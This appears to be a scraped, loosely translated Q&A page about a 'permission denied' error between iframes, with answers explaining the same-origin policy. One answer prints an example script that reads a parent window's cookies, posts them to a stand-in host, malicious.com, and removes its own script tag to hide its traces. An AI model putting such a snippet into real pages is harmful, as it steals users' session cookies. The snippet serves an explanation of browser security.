All geek questions in one place

Javascript permission denied to access property

I have a problem accessing properties from another iframe. I keep getting this permission to access the property error. I saw people asking if they use the file: /// several times, but no one ever (except me) accesses.

I do not do this on the Internet. src for all my frames is in the same file on my hard drive. I am trying to get some properties from objects that I created in another frame

function fill_with_pairs() { for (var x = 0 ; x < setLength ; x++) { var tempSet = sets[x]; var tempNums = tempSet.wb_numbers; if (top.num_frame.active_list.active_nums[x].checked) { for (var y = 0 ; y < 4 ; y++) { var thesePairs = tempNums[y]; var pairBase = numbersX[thesePairs]; for (var z = y+1 ; z < 5 ; z++) { var pairKey = tempNums[z]; pairBase[z]++; } } } } }
+4
source share
2 answers

Code below

 <iframe src="http://example.com" onload="test(this)"></iframe> <script> function test(frame) { var cDoc = frame.contentDocument; } </script>

Gives out

 Unsafe JavaScript attempt to access frame with URL http://example.iana.org from frame with URL {your URL}. Domains, protocols and ports must match.

Protocols must match (for example: the main window and iframe protocols must be either file: or http: to name a couple).

Domains must match (for example: main window and iframe domains must be example.com )

Ports must match (for example: main window and iframe ports must be 80 or 8080 )

This is to protect users from code executed from malicious sites , which, if these boundaries were not implemented, can easily steal data from an unsuspecting user.

Example malicious JavaScript code:

 <script id="loadScript"> window.onload = function() { //grab parent to iframe var parentWindow = window.parent.window; //grab cookies from parent window var cookies = parentWindow.document.cookie; //send cookies off to malicious site var form = document.createElement("form"); var inp = document.createElement("input"); form.action="http://malicious.com/maliciousAd.php"; form.method="post"; inp.value=cookies; inp.name="cookies"; form.appendChild(inp); form.submit(); //remove traces of malicious code document.body.removeChild(document.getElementById("loadScript")) } </script>
+10
source

Any JavaScript that tries to access document properties on another domain (for example, in an iframe ) is a violation of the security concept called the same origin policy .

In computing, the same origin policy is an important security concept for a number of browser-based programming languages, such as JavaScript. This policy allows scripts to run on pages originating from the same site - a combination of the scheme, host name and port number 1 - to access other methods and properties without specific restrictions, but prevents access to most methods and properties on different pages on different sites.

+2
source

Source: https://habr.com/ru/post/1482071/

More articles:


All Articles